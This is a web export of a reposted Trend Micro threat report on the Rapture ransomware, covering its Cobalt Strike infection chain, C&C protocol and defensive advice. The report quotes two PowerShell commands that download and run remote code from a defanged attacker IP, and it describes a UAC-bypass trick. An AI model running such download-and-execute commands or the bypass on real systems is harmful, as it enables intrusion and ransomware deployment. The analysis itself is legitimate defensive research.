{"id":51671,"date":"2023-04-28T00:00:00","date_gmt":"2023-04-28T00:00:00","guid":{"rendered":"urn:uuid:dbde8a7e-2662-52bf-1e3a-6c3e7a19e90d"},"modified":"2023-04-28T00:00:00","modified_gmt":"2023-04-28T00:00:00","slug":"rapture-a-ransomware-family-with-similarities-to-paradise","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/","title":{"rendered":"Rapture, a Ransomware Family With Similarities to Paradise"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/23\/rapture-641.png\"> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"50.420834900338\"> <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"128584148\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"9.8148148148148\">\n<div class=\"article-details\" 
role=\"heading\" readability=\"39.259259259259\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">Ransomware<\/p>\n<p class=\"article-details__description\">In March and April 2023, we observed a type of ransomware targeting its victims via a minimalistic approach with tools that leave only a minimal footprint behind. Our findings revealed many of the preparations made by the perpetrators and how quickly they managed to carry out the ransomware attack.<\/p>\n<p class=\"article-details__author-by\">By: Don Ovid Ladores, Ian Kenefick, Earle Maui Earnshaw <time class=\"article-details__date\">April 28, 2023<\/time> <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-md-8 col-md-push-2\"> <\/p>\n<div class=\"richText\" readability=\"41.831589958159\">\n<div readability=\"30.772663877266\">\n<p>In March and April 2023, we observed a type of <a href=\"https:\/\/www.trendmicro.com\/vinfo\/ph\/security\/definition\/Ransomware\">ransomware<\/a> targeting its victims via a minimalistic approach with tools that leave only a minimal footprint behind. Our findings revealed many of the preparations made by the perpetrators and how quickly they managed to carry out the ransomware attack.<\/p>\n<p>The memory dump during the ransomware\u2019s execution reveals an RSA key configuration file similar to that used by the <a href=\"https:\/\/www.trendmicro.com\/vinfo\/ph\/security\/news\/cybercrime-and-digital-threats\/new-variant-of-paradise-ransomware-spreads-through-iqy-files\">Paradise ransomware<\/a>. To make analysis more difficult, the attackers packed the Rapture ransomware <a href=\"https:\/\/www.oreans.com\/Themida.php\">using Themida<\/a>, a commercial packer. 
Rapture requires at least a .NET 4.0 framework for proper execution; this suggests more similarities with Paradise, which has been known to be compiled as a .NET executable. For this reason, we dubbed this ransomware type as Rapture, a closely related nomenclature to Paradise.<\/p>\n<p>It is important to note that although it shares certain similarities with Paradise, Rapture\u2019s behavior is different from the former.<\/p>\n<p>In April, we found a couple of ransomware activities that appear to be injected in legitimate processes. By tracing these activities back to the source process, we found that the ransomware appeared as an activity loaded into memory from a <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/g\/tracking_cobalt_strike_a_vision_one_investigation.html\">Cobalt Strike<\/a> beacon. In some instances, the attackers dropped the ransomware in a folder or drive as a <i>*.log<\/i> file:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">&nbsp;<i>E:\\ITS.log<\/i><\/span><\/li>\n<li><span class=\"rte-red-bullet\">&nbsp;<i>C:\\[Redacted]\\Aps.log<\/i><\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"d2672c\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-1.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-1.png\" alt=\"Figure 1. The ransomware file packed using Themida\"> <\/a><figcaption>Figure 1. 
The ransomware file packed using Themida<\/figcaption><\/figure>\n<\/p><\/div>\n<div readability=\"5.8533161773307\">\n<div class=\"richText\" readability=\"35.5\">\n<div readability=\"16\">\n<p>The Rapture ransomware drops its notes to every traversed directory (the first six characters might appear to be random, but they are actually hard-coded string configurations).<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><i>7qzxid-README.txt<\/i><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><i>qiSgqu-README.txt<\/i><\/span><\/li>\n<\/ul>\n<p>It then appends the same six characters to the following encrypted files:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><i>*.7qzxid<\/i><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><i>*.qiSgqu<\/i><\/span><\/li>\n<\/ul>\n<p>Rapture requires certain command lines (shown in Figure 2) to execute properly. Once the correct argument is passed to the malicious file, it starts the ransomware routine, which is also displayed in its console window.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"b17480\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-2.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-2.png\" alt=\"Figure 2. 
Execution of the Rapture ransomware using the correct command-line arguments (top) and the console window during ransomware execution (bottom)\"> <\/a> <\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"5d7b68\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-2b.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-2b.png\" alt=\"Figure 2. Execution of the Rapture ransomware using the correct command-line arguments (top) and the console window during ransomware execution (bottom)\"> <\/a><figcaption>Figure 2. Execution of the Rapture ransomware using the correct command-line arguments (top) and the console window during ransomware execution (bottom)<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"30.594752186589\">\n<div readability=\"10.198250728863\">\n<p>The dropped ransom note bears some resemblance to the <a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/security\/news\/cybercrime-and-digital-threats\/ransomware-recap-snatch-and-zeppelin-ransomware\">Zeppelin ransomware<\/a> (although we believe this is the only connection between the two). 
We tried to glean additional information from the ransom note and discovered that the Rapture ransomware has been <a href=\"https:\/\/bbs.360.cn\/thread-16071225-1-1.html\">around<\/a> for a while now, but there were no samples available during its initial sighting.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"1e45d5\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-3.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-3.png\" alt=\"Figure 3. The dropped ransom note\"> <\/a><figcaption>Figure 3. The dropped ransom note<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32.541666666667\">\n<div readability=\"10.847222222222\">\n<p>During our investigation, we discovered that the whole infection chain spans three to five days at most (counting from the time of discovery of the reconnaissance commands). 
Rapture\u2019s operators first perform the following, likely to guarantee a more successful attack:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Inspect firewall policies<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Check the PowerShell version<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Check for vulnerable <a href=\"https:\/\/www.trendmicro.com\/en_us\/apache-log4j-vulnerability.html\">Log4J<\/a> applets<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"0ea720\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-4.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-4.png\" alt=\"Figure 4. One of the PowerShell command lines found during the reconnaissance stage\"> <\/a><figcaption>Figure 4. 
One of the PowerShell command lines found during the reconnaissance stage<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"41.5\">\n<div readability=\"28\">\n<p>After a successful reconnaissance routine, the attackers proceed with the first stage of the attack by downloading and executing a PowerShell script to install Cobalt Strike in the target\u2019s system.<\/p>\n<p>After the reconnaissance stage, the attackers will try to gain access to the victim\u2019s network (likely through vulnerable public-facing websites and servers since their initial entry is via <i>w3wp.exe<\/i> for PowerShell execution).<\/p>\n<p>The following command is used for the first execution instance of PowerShell through <i>w3wp.exe<\/i>:<\/p>\n<p><i><span class=\"blockquote\">\/c powershell set-alias -name aspersky -value Invoke-Expression;aspersky(New-Object Net.WebClient).DownloadString(\u2018[hxxp]:\/\/195.123.234[.]101:80\/Sharepoint\/Pickers.aspx\u2019)<\/span><\/i><\/p>\n<p>Meanwhile, the second execution instance, this time from Windows Management Instrumentation (WMI), is done via the following command:<\/p>\n<p><i><span class=\"blockquote\">\/c powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString(&#8216;[hxxp]:\/\/195.123.234[.]101:80\/Microsoft\/Online&#8217;)<\/span><\/i><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"679d1f\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-5.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-5.png\" alt=\"Figure 5. PowerShell of the first-stage downloader \"> <\/a><figcaption>Figure 5. 
PowerShell of the first-stage downloader <\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"38.395338983051\">\n<div readability=\"23.328813559322\">\n<p>The attacks use a unique method of obtaining higher privileges to execute the payload. By default, there is a task in newer versions of Windows called <i><a href=\"https:\/\/devblogs.microsoft.com\/oldnewthing\/20220524-00\/?p=106682\">CreateExplorerShellUnelevatedTask<\/a><\/i> that prevents <i>explorer.exe<\/i> from running with elevated privileges. However, if <i>explorer.exe<\/i> is launched using the command line <i>\/NOUACCHECK<\/i>, it inherits the elevated status from the parent process. In this case, the malicious actors injected the malicious activity into an existing <i>svchost.exe<\/i>, which serves as the parent process. The <i>svchost.exe<\/i> process then executes <i>explorer.exe<\/i> using the <i>\/NOUACCHECK<\/i> command. Once this is done, <i>explorer.exe<\/i> can then be used to drop and execute the second stage Cobalt Strike beacon downloader.<\/p>\n<p>The second-stage downloader will then connect to the following address to download the main Cobalt Strike beacon:&nbsp;<i>195.123.234[.]101\/DoFor\/review\/Mcirosoft<\/i><\/p>\n<p>The data response from the command-and-control (C&amp;C) server contains the encrypted beacon sandwiched in the middle of a JavaScript file (with the script code bearing no actual usage or significance for the malware chain). 
The downloader decrypts the sandwiched code and then executes the Cobalt Strike beacon.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"cdaa0b\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-6.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-6.png\" alt=\"Figure 6. The Cobalt Strike downloader C&amp;C server response containing the encrypted beacon\"> <\/a><figcaption>Figure 6. The Cobalt Strike downloader C&amp;C server response containing the encrypted beacon<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35.5\">\n<div readability=\"16\">\n<p>The second (main) stage beacon will attempt to connect to another subfolder in the same C&amp;C server, where it will attempt to receive the backdoor command and other payloads. 
Similarly, the response of the C&amp;C server is also sandwiched in another JavaScript code that will be decoded by the following beacon:&nbsp;<i>195.123.234[.]101\/Make\/v8.01\/Sharepoint<\/i><\/p>\n<p>Based on our analysis of the decrypted C&amp;C response from the beacon, we have deduced that the decoded content will have the following structure (after the beacon removes the garbage padding):<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<table cellpadding=\"1\" cellspacing=\"1\" border=\"1\" width=\"100%\" height=\"10%\">\n<tbody readability=\"5\">\n<tr>\n<td height=\"42\" width=\"248\"><b>Offset<\/b><\/td>\n<td width=\"248\"><b>Length<\/b><\/td>\n<td width=\"248\"><b>Data<\/b><\/td>\n<td width=\"248\"><b>Description<\/b><\/td>\n<\/tr>\n<tr>\n<td height=\"48\" width=\"248\">0x00<\/td>\n<td width=\"248\">0x04<\/td>\n<td width=\"248\">N\/A<\/td>\n<td width=\"248\">Four-byte header<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td height=\"68\" width=\"248\">0x04<\/td>\n<td width=\"248\">0x04<\/td>\n<td width=\"248\">0x04000000<\/td>\n<td width=\"248\">Flag (big endian will convert to little endian after decryption)<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td height=\"71\" width=\"248\">0x08<\/td>\n<td width=\"248\">0x04<\/td>\n<td width=\"248\">0xnn000000<\/td>\n<td width=\"248\">Backdoor command (big endian will convert to little endian after decryption)<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td height=\"78\" width=\"248\">0x0c<\/td>\n<td width=\"248\">0x04<\/td>\n<td width=\"248\">N\/A<\/td>\n<td width=\"248\">Data size, length of additional data from the response; big endian will convert to little endian after decryption<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td height=\"71\" width=\"248\">0x10<\/td>\n<td width=\"248\">Depends on [0x0c]<\/td>\n<td width=\"248\">N\/A<\/td>\n<td width=\"248\">Additional data to be supplied to some of the backdoor 
commands<\/td>\n<\/tr>\n<\/tbody>\n<\/table><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32\">\n<p><h5>Table 1. The structure of the decrypted C&amp;C server response from the beacon communication<\/h5>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35.5\">\n<div readability=\"16\">\n<p>We found that the beacon performed ransomware activities in the majority of the affected systems, which implies that the code is downloaded and executed in memory except for a few machines where we found the actual ransomware.<\/p>\n<p>We tried to gather more information about the Cobalt Strike beacon via its watermark and discovered that the same watermark is also used by other threat actors. This indicates that it is likely that Rapture\u2019s operators are using a pirated Windows license which is also being used by several others.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"ce8f5b\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-7.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-7.png\" alt=\"Figure 7. The particular Cobalt Strike watermark as seen in relation to different groups\"> <\/a><figcaption>Figure 7. The particular Cobalt Strike watermark as seen in relation to different groups<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"44.246015936255\">\n<div readability=\"36.158034528552\">\n<p>The Rapture ransomware is cleverly designed and bears some similarities to other ransomware families such as Paradise. 
Although its operators use tools and resources that are readily available, they have managed to use them in a way that enhances Rapture\u2019s capabilities by making it stealthier and more difficult to analyze. As is the case with many modern families, these types of fairly sophisticated ransomware are beginning to become the norm in many present-day campaigns.<\/p>\n<p>To protect their systems from ransomware attacks, organizations can implement security frameworks that systematically allocate resources to establish a robust defense strategy. Here are some recommended guidelines for organizations to consider:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Conduct an inventory of assets and data.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Identify authorized and unauthorized devices and software.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Audit event and incident logs.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Manage hardware and software configurations.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Grant admin privileges and access only when necessary for an employee&#8217;s role.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Monitor network ports, protocols, and services.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Establish a software allowlist that only allows legitimate applications to execute.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Implement data protection, backup, and recovery measures.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Enable multifactor authentication (MFA).<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Deploy the latest versions of security solutions to all layers of the system, including email, endpoint, web, and network.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Watch for early signs of an attack, such as the presence of suspicious tools in the system.<\/span><\/li>\n<\/ul>\n<p>Organizations can adopt 
a multifaceted approach to secure potential entry points into their systems, such as endpoints, email, web, and networks. By using security solutions that can detect malicious elements and questionable activities, enterprises can protect themselves from ransomware attacks.<\/p>\n<p>A multilayered approach can help organizations guard possible entry points into their system (endpoint, email, web, and network). Security solutions can detect malicious components and suspicious behavior, which can help protect enterprises.<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/detection-response.html\">Trend Micro Vision One\u2122<\/a>\u202fprovides multilayered protection and behavior detection, which helps block questionable behavior and tools before the ransomware can do any damage.<\/span><\/li>\n<li><span class=\"rte-red-bullet\"><a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/hybrid-cloud\/cloud-one-workload-security.html\">Trend Micro Cloud One\u2122 \u2013 Workload Security<\/a>\u202fprotects systems against both known and unknown threats that exploit vulnerabilities. 
This protection is made possible through techniques such as virtual patching and machine learning.<\/span><\/li>\n<li><span class=\"rte-red-bullet\"><a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/user-protection\/sps\/email-and-collaboration\/email-inspector.html\">Trend Micro\u2122 Deep Discovery\u2122 Email Inspector<\/a>\u202femploys custom sandboxing and advanced analysis techniques to effectively block malicious emails, including phishing emails that can serve as entry points for ransomware.<\/span><\/li>\n<li><span class=\"rte-red-bullet\"><a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/user-protection\/sps\/endpoint.html\">Trend Micro Apex One\u2122<\/a>\u202foffers next-level automated threat detection and response against advanced concerns such as fileless threats and ransomware, ensuring the protection of endpoints.<\/span><\/li>\n<\/ul>\n<p><b><span class=\"body-subhead-title\">Indicators of Compromise (IOCs)<\/span><\/b><\/p>\n<p>The indicators of compromise for this entry can be found <a href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/iocs-rapture-a-ransomware-family-with-similarities-to-paradise.txt\">here<\/a>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p> <\/body> Read More <a 
href=\"https:\/\/www.trendmicro.com\/en_us\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In March and April 2023, we observed a type of ransomware targeting its victims via a minimalistic approach with tools that leave only a minimal footprint behind. Our findings revealed many of the preparations made by the perpetrators and how quickly they managed to carry out the ransomware attack. Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":51672,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9508,9539,9509],"class_list":["post-51671","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-endpoints","tag-trend-micro-research-ransomware","tag-trend-micro-research-research"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Rapture, a Ransomware Family With Similarities to Paradise 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Rapture, a Ransomware Family With Similarities to Paradise 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2023-04-28T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/23\/rapture-641.png\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/rapture-a-ransomware-family-with-similarities-to-paradise\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/rapture-a-ransomware-family-with-similarities-to-paradise\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Rapture, a Ransomware Family With Similarities to Paradise\",\"datePublished\":\"2023-04-28T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/rapture-a-ransomware-family-with-similarities-to-paradise\\\/\"},\"wordCount\":1579,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/rapture-a-ransomware-family-with-similarities-to-paradise\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/rapture-a-ransomware-family-with-similarities-to-paradise.png\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Endpoints\",\"Trend Micro Research : Ransomware\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/rapture-a-ransomware-family-with-similarities-to-paradise\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/rapture-a-ransomware-family-with-similarities-to-paradise\\\/\",\"name\":\"Rapture, a Ransomware Family With Similarities to Paradise 2026 | ThreatsHub Cybersecurity 
News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/rapture-a-ransomware-family-with-similarities-to-paradise\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/rapture-a-ransomware-family-with-similarities-to-paradise\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/rapture-a-ransomware-family-with-similarities-to-paradise.png\",\"datePublished\":\"2023-04-28T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/rapture-a-ransomware-family-with-similarities-to-paradise\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/rapture-a-ransomware-family-with-similarities-to-paradise\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/rapture-a-ransomware-family-with-similarities-to-paradise\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/rapture-a-ransomware-family-with-similarities-to-paradise.png\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/rapture-a-ransomware-family-with-similarities-to-paradise.png\",\"width\":974,\"height\":510},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/rapture-a-ransomware-family-with-similarities-to-paradise\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Tre
nd Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Rapture, a Ransomware Family With Similarities to Paradise\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence 
Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\